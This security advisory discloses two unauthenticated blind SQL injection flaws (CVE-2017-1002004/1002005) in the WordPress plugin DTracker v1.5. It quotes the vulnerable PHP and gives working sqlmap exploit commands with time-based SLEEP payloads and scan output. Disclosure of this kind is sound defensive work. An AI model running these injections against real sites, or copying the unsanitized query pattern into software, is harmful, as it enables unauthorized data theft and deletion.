Advisory #: 183
Title: Multiple Blind SQL injection vulnerability in Wordpress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-ID:[CVE-2017-1002004][CVE-2017-1002005]
CWE: CWE-89 SQL Injection
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-08
Vendor Contact: plugins@wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=183
Description: Track the details of the users downloading the pdf files from wordpress site.
Vulnerability:
CVE-2017-1002004: In file ./dtracker/download.php user input isn't sanitized via the id variable before adding it to the end of an SQL query. $doc_id = $_GET['id']; $file = $wpdb->get_results( "SELECT * FROM wp_posts WHERE ID = $doc_id " ); The user does not need to be authenticated to the Wordpress installation to exploit this vulnerability. CVE-2017-1002005: In file ./dtracker/delete.php user input isn't sanitized via the contact_id variable before adding it to the end of an SQL query. $contact_id = $_POST['contact_id']; //Contact ID to be deleted $query = "DELETE FROM wp_contacts WHERE id = $contact_id"; $wpdb->query($query); // Delete the contact The user does not need to be authenticated to the Wordpress installation to exploit this vulnerability.
Export: JSON TEXT XML
Exploit Code:
  1. $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/download.php?id=*'  --dbms mysql  --level 3 --risk 3
  2. URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
  3. sqlmap identified the following injection point(s) with a total of 1410 HTTP(s) requests:
  4. ---
  5. Parameter: #1* (URI)
  6.     Type: AND/OR time-based blind
  7.     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
  8.     Payload: http://192.168.0.169:80/wordpress/wp-content/plugins/dtracker/download.php?id=(CASE WHEN (7148=7148) THEN SLEEP(5) ELSE 7148 END)
  9. ---
  10. [10:14:09] [INFO] the back-end DBMS is MySQL
  11. web server operating system: Linux Ubuntu 16.04 (xenial)
  12. web application technology: Apache 2.4.18
  13. back-end DBMS: MySQL >= 5.0.12
  14. [10:14:09] [WARNING] HTTP error codes detected during run:
  15. 404 (Not Found) - 14 times
  16. [10:14:09] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
  17.  
  18. $ sqlmap -u 'http://example.com/wordpress/wp-content/plugins/dtracker/delete.php' --data 'contact_id=*'  --dbms mysql --risk 1 --level 3
  19.  
  20. (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
  21. sqlmap identified the following injection point(s) with a total of 831 HTTP(s) requests:
  22. ---
  23. Parameter: #1* ((custom) POST)
  24.     Type: AND/OR time-based blind
  25.     Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
  26.     Payload: contact_id=(SELECT * FROM (SELECT(SLEEP(5)))Vtrh)
  27. ---
  28. [11:53:27] [INFO] the back-end DBMS is MySQL
  29. web server operating system: Linux Ubuntu 16.04 (xenial)
  30. web application technology: Apache 2.4.18
  31. back-end DBMS: MySQL >= 5.0.12
  32. [11:53:27] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
Screen Shots:
Notes: